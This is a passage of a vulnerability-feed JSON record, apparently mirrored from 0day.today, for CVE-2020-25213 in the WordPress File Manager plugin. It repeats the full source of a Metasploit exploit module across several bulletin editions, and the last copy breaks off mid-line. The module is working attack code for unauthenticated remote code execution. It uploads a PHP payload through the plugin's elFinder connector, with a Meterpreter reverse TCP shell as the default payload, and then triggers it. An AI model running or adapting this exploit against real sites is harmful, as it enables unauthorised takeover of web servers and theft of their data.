"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-01T08:25:54", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-31T08:17:11", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-31T08:17:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-11-01] #", "category": "", "verified": false}, "lastseen": "2021-11-01T08:25:54", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "274caeaa269b18f78b2bd7b0e6e807ac", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-02T06:18:07", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-02T06:18:07", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-11-02T06:18:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-11-02] #", "category": "", "verified": false}, "lastseen": "2021-11-02T06:18:07", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "e8c44c2ddf1c5c487c25b623dbacaf56", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-03T00:11:38", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-02T06:18:07", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-11-02T06:18:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-11-03] #", "category": "", "verified": false}, "lastseen": "2021-11-03T00:11:38", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a063d4ff7717e91fd58d608669c83523", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-03T22:21:55", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-02T06:18:07", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-11-02T06:18:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; 